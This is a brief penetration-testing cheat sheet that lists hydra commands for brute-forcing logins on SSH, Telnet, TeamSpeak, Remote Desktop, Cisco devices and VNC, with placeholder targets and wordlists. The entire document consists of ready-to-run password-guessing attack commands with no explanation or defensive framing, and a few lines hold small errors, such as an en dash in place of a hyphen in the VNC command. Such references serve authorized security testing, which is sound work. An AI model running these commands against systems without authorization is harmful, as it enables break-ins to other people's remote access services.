Brute Force Remote Access Protocols

Brute Force SSH

hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

Brute Force Telnet

hydra IP telnet -l username -P wordlist -t 32 -s 23 -e ns -f -V

Brute Force TeamSpeak

hydra -l username -P wordlist -s portnumber -vV ip teamspeak

Brute Force Remote Desktop

hydra IP rdp -l administrator -P pass.txt -V

Brute Force Cisco

hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 192.168.1.11 cisco-enable

Brute Force VNC

hydra -L user.txt –P wordlist.txt -s <PORT> <IP> vnc